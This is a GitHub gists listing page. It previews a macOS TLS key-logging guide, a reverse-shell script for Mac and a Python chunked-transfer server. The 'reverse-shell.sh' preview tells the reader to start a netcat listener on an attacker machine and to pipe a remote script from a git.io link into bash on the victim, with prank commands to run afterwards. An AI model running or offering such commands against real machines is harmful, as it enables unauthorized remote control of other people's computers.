Skip to content

Instantly share code, notes, and snippets.

View mikebeaton's full-sized avatar

Mike Beaton mikebeaton

63 followers · 2 following
View GitHub Profile
@felixhammerl
felixhammerl / README.md
Last active March 20, 2024 02:58
MitM TLS encrypted traffic in macOS using SSLKEYLOGFILE

Option 1: Via macOS environment variable:

  1. mkdir -p ~/Library/LaunchAgents
  2. Put tlskeylogger.plist at ~/Library/LaunchAgents/tlskeylogger.plist
  3. launchctl load ~/Library/LaunchAgents/tlskeylogger.plist, so it will load on the next restart
  4. launchctl start ~/Library/LaunchAgents/tlskeylogger.plist, so it will load the environment variable immediately
  5. Restart your browser(s)
  6. See how TLS keys are being written to ~/.tlskeyfile via tail -f ~/.tlskeyfile

NB: This may be hit or miss and many apps do not respect the env var.

@mattes
mattes / reverse-shell.sh
Last active March 31, 2024 20:28
Reverse Shell Mac
#!/usr/bin/env bash
# run `nc -nvl 80` on attacker machine first
# run `curl -Ls https://git.io/vXd2N | bash -s <attacker-ip> 80` on victim machine
# great commands to run:
# * curl http://discovermagazine.com/~/media/import/images/b/e/b/chimpmedia.jpg -o /tmp/monkey.jpg
# open /tmp/monkey.jpg
# * say hello
# * open http://lmgtfy.com/?q=how+to+lock+mac
# * ls
@josiahcarlson
josiahcarlson / chunked_server_test.py
Last active March 20, 2024 20:30
Use some standard Python libraries to implement a chunked-transfer encoding web server with partially-working gzip support
'''
chunked_server_test.py
Copyright August 3, 2012
Released into the public domain
This implements a chunked server using Python threads and the built-in
BaseHTTPServer module. Enable gzip compression at your own peril - web
browsers seem to have issues, though wget, curl, Python's urllib2, my own
async_http library, and other command-line tools have no problems.